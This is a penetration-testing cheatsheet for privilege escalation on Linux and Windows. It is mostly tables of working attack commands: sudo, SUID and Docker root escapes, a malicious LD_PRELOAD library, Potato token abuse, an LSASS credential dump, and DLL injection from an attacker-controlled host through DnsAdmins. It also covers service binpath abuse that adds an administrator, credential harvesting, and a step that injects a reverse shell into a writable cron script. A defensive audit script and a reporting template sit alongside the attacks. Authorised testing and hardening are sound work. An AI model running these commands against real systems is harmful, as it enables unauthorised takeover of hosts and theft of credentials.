🛡️ Methodology Checklist
- Run automated tool first: LinPEAS (Linux) / WinPEAS (Windows)
- Linux: sudo -l → SUID → cron → capabilities → groups → kernel
- Windows: whoami /priv → token abuse → group privileges → weak perms → UAC
- Credential hunt on both platforms before kernel exploits
- Use GTFOBins (Linux) and LOLBAS (Windows) for binary abuse
- Document full escalation path before proceeding to next phase
🎯 Operational Context
Use when: Shell obtained on any OS — master reference for privilege escalation enumeration and exploitation commands for Linux and Windows.
Think Dumber First: run two commands before anything else: sudo -l (Linux) / whoami /priv (Windows). Together they cover the highest-yield privesc paths in 10 seconds.
Skip when: N/A — master reference document.
⚡ Tactical Cheatsheet
Linux — Enumeration
| Command | Tactical Outcome |
|---|---|
| ./linpeas.sh \| tee linpeas.out | LinPEAS — full automated enumeration |
| uname -a; cat /etc/os-release | OS/kernel version |
| id; whoami; groups | Current user context |
| sudo -l | Sudo rights — check every binary against GTFOBins |
| find / -perm -4000 -type f 2>/dev/null | SUID binaries |
| find / -perm -2000 -type f 2>/dev/null | SGID binaries |
| getcap -r / 2>/dev/null | Linux capabilities |
Linux — Quick-Win Attacks
| Command | Tactical Outcome |
|---|---|
| sudo [GTFOBins_BINARY] | Abuse sudo right → shell |
| [SUID_BINARY] | Exploit SUID binary (check GTFOBins) |
| cat /etc/crontab; ls /etc/cron.* | Cron jobs — look for writable scripts |
| cat /etc/exports | NFS — check for no_root_squash |
| ls -al /tmp/.ICE-unix/ /tmp/tmux-* | Tmux socket hijack |
| python3 -c "import pty; pty.spawn('/bin/bash')" | Upgrade to PTY |
Linux — Group & Capability Abuse
| Command | Tactical Outcome |
|---|---|
| docker run -v /:/mnt --rm -it alpine chroot /mnt sh | Docker group → root |
| lxc init ubuntu:18.04 privesc -c security.privileged=true | LXD group → privileged container |
| debugfs /dev/sda1 | Disk group → raw filesystem access |
| python3 -c "import os; os.setuid(0); os.system('/bin/bash')" | cap_setuid exploit |
Linux — LD_PRELOAD & Library Hijack
| Command | Tactical Outcome |
|---|---|
| sudo -l \| grep env_keep | Check for LD_PRELOAD preservation |
| gcc -fPIC -shared -o /tmp/preload.so preload.c -nostartfiles | Compile malicious .so |
| sudo LD_PRELOAD=/tmp/preload.so [SUDO_BINARY] | Inject via sudo |
| readelf -d [SUID_BINARY] \| grep RUNPATH | Check RUNPATH for hijack |
Windows — Token Privileges
| Command | Tactical Outcome |
|---|---|
| whoami /priv | List all token privileges |
| whoami /groups | List group memberships |
| systeminfo \| findstr /B /C:"OS" | OS version and build number |
| .\JuicyPotato.exe -l [PORT] -p cmd.exe -t * -c [CLSID] | SeImpersonate → SYSTEM (build < 1809) |
| .\PrintSpoofer.exe -i -c cmd | SeImpersonate → SYSTEM (build ≥ 1809) |
| .\GodPotato.exe -cmd "cmd /c whoami" | SeImpersonate → SYSTEM (any modern build) |
| procdump.exe -accepteula -ma lsass.exe lsass.dmp | SeDebugPrivilege → LSASS dump |
| takeown /f [FILE]; icacls [FILE] /grant [USER]:F | SeTakeOwnershipPrivilege |
Windows — Group Privilege Abuse
| Command | Tactical Outcome |
|---|---|
| reg query HKLM\...\Policies\System /v ConsentPromptBehaviorAdmin | Check UAC level |
| dnscmd [DC] /serverlevelplugindll \\[LHOST]\share\evil.dll | DnsAdmins → DLL injection |
| sc config [SERVICE] binpath= "cmd /c net localgroup administrators [USER] /add" | Server Operators → service abuse |
| wevtutil qe Security /c:1000 /rd:true /f:text \| findstr /i "pass" | Event Log Readers → mine creds |
Windows — Weak Permissions
| Command | Tactical Outcome |
|---|---|
| .\SharpUp.exe audit | Automated weak permission audit |
| icacls [SERVICE_BINARY_PATH] | Check service binary ACL |
| sc qc [SERVICE] | Query service binary path |
| copy /Y [MALICIOUS].exe [SERVICE_BINARY_PATH] | Overwrite vulnerable binary |
| wmic service get name,pathname \| findstr /i "auto" \| findstr /iv "c:\\windows" | Find unquoted service paths |
| accesschk.exe -kvuqsw HKLM\SYSTEM\CurrentControlSet\Services | Writable service registry keys |
Windows — Credential Hunting
| Command | Tactical Outcome |
|---|---|
| findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul | File-based cred search |
| (Get-PSReadLineOption).HistorySavePath | PowerShell command history path |
| cmdkey /list | Stored Windows Credential Manager entries |
| reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Autologon credentials |
| .\lazagne.exe all | LaZagne — automated credential extraction |
| keepass2john database.kdbx > hash.txt | KeePass hash for cracking |
Windows — Automated Tools
| Command | Tactical Outcome |
|---|---|
| .\winpeas.exe > winpeas.txt | WinPEAS — full automated audit (red+yellow = critical) |
| .\Seatbelt.exe -group=user | Seatbelt user-context checks |
| .\Seatbelt.exe -group=system | Seatbelt system-level checks |
| Invoke-AllChecks | PowerUp — service/registry vulnerability scan |
| .\Watson.exe | Missing patches → local privilege escalation |
OS Build → Potato Selector
| OS Build | OS Version | Potato |
|---|---|---|
| ≤ 1803 | Server 2016 / Win 10 (old) | JuicyPotato |
| 1809–19H1 | Server 2019 / Win 10 | PrintSpoofer |
| ≥ 19H2 | Server 2019+ / Win 11 | GodPotato / PrintSpoofer |
| Any | Any (with SeImpersonate) | GodPotato (most universal) |
🔬 Deep Dive & Workflow
Linux PrivEsc Decision Tree
1. sudo -l → GTFOBins hit? → exploit
2. SUID binaries → GTFOBins hit? → exploit
3. id → docker/lxd/disk group? → container escape / debugfs
4. cron writable script? → inject reverse shell
5. LD_PRELOAD env_keep in sudo? → .so injection
6. NFS no_root_squash? → SUID binary on mount
7. Capabilities? → cap_setuid python3 exploit
8. Logrotate writable log? → logrotten
9. Kernel exploit (last resort — compile natively on target)
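The defender's counterpart to the Linux tables and decision tree above, added here as an example and not part of the original cheatsheet: a POSIX shell audit that flags the same misconfigurations (sudo env_keep of loader variables, NOPASSWD rules for GTFOBins review, NFS no_root_squash, world-writable cron scripts) in configuration files. The sample files, the user "bob" and the paths in them are constructed; point the functions at the real /etc paths to audit a host.

```shell
#!/bin/sh
# Hardening audit for the Linux misconfigurations the tables above enumerate.
# Added example, not part of the original cheatsheet. Every input is a
# constructed sample file written to a temp dir, so it runs offline without
# root; point the functions at the real paths to audit a live host.

SAMPLE_DIR=$(mktemp -d)
mkdir -p "$SAMPLE_DIR/cron.d"
cat > "$SAMPLE_DIR/sudoers" <<'EOF'
Defaults    env_reset
Defaults    env_keep += "LD_PRELOAD"
bob ALL=(ALL) NOPASSWD: /usr/bin/vim
EOF
cat > "$SAMPLE_DIR/exports" <<'EOF'
/srv/share   10.0.0.0/24(rw,sync,no_root_squash)
/srv/public  *(ro,sync)
EOF
printf '#!/bin/sh\nlogrotate /etc/logrotate.conf\n' > "$SAMPLE_DIR/cron.d/rotate.sh"
chmod 0777 "$SAMPLE_DIR/cron.d/rotate.sh"   # constructed: world-writable cron script

# Each check prints one prefixed line per finding and nothing when clean.
sudoers_findings() {   # $1 = sudoers file
  # env_keep of loader variables lets LD_PRELOAD survive into the sudo target
  grep -E 'env_keep[[:space:]]*\+?=.*LD_(PRELOAD|LIBRARY_PATH)' "$1" \
    | sed 's/^/sudoers-env_keep: /'
  # every NOPASSWD rule is a review item: compare the binary against GTFOBins
  grep -E '^[^#]*NOPASSWD:' "$1" | sed 's/^/sudoers-nopasswd: /'
}
exports_findings() {   # $1 = exports file
  grep -E '^[^#]*[(,]no_root_squash[,)]' "$1" | sed 's/^/nfs-no_root_squash: /'
}
cron_findings() {      # $1 = cron directory
  find "$1" -type f -perm -002 | sed 's/^/cron-world-writable: /'
}

all_findings() {       # $1 = directory holding sudoers, exports and cron.d
  sudoers_findings "$1/sudoers"
  exports_findings "$1/exports"
  cron_findings "$1/cron.d"
}
count_findings() {     # total number of findings, printed on stdout
  all_findings "$1" | wc -l | tr -d ' '
}

all_findings "$SAMPLE_DIR"
echo "findings: $(count_findings "$SAMPLE_DIR")"
```

On the constructed sample the audit reports four findings; a clean configuration produces no output and a count of 0.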
Windows PrivEsc Decision Tree
1. whoami /priv → SeImpersonate/SeAssignPrimary? → Potato
2. whoami /priv → SeDebugPrivilege? → LSASS dump
3. whoami /priv → SeTakeOwnership? → file hijack
4. whoami /groups → Backup Operators? → SAM/NTDS dump
5. whoami /groups → DnsAdmins? → DLL injection
6. whoami /groups → Server Operators? → service binpath abuse
7. SharpUp → service binary writable? → overwrite
8. SharpUp → unquoted path? → plant binary
9. SharpUp → registry key writable? → ImagePath hijack
10. AlwaysInstallElevated (both regs = 1)? → MSI payload
11. UAC + Admins group? → fodhelper / srrstr bypass
12. Credential hunt → runas /savecred
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| LinPEAS/WinPEAS not running | AV or download blocked | Fall back to manual commands in this cheatsheet; manual checks cover 80% of what automation finds |
| Privesc found but requires reboot | Cannot wait for reboot | Note finding; pursue other paths; schedule reboot if possible (may trigger monitoring) |
| Multiple privesc paths | Unsure which to use | Choose lowest-noise path first; kernel exploits last (crash risk); service abuse before exploit |
| Privesc requires compilation | No compiler on target | Compile on matching-arch attack box; transfer binary; ensure static compilation if possible |
| PrivEsc path exists but blocked by monitoring | EDR detecting | Use LOL techniques; document the path even if not exploitable — still a finding |
📝 Reporting Trigger
Finding Title: Privilege Escalation Achieved — SYSTEM/Root Access Obtained
Impact: Full operating system access achieved via privilege escalation enables credential harvesting, persistence installation, lateral movement preparation, and complete control over the compromised host and all data it processes.
Root Cause: System hardening deficiencies including misconfigured permissions, SUID binaries, weak sudo rules, or unpatched privilege escalation vulnerabilities.
Recommendation: Apply OS hardening benchmarks (CIS). Regularly run privilege escalation enumeration scripts against all systems. Patch known privilege escalation CVEs within SLA. Implement host-based monitoring for privilege escalation indicators.